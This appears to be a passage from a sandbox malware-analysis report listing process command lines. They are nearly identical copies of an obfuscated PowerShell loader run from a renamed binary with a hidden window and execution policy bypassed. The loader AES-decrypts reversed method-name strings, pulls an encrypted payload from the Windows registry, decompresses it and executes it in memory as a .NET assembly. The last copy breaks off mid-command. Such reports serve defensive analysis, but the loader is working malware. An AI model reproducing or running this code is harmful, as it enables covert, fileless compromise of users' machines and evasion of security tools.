        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6068).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        12⤵
        
        PID:4316
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6068).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        12⤵
        
        PID:5364
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6068).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        12⤵
        Hide Artifacts: Hidden Window
        
        PID:7080
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6068).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = 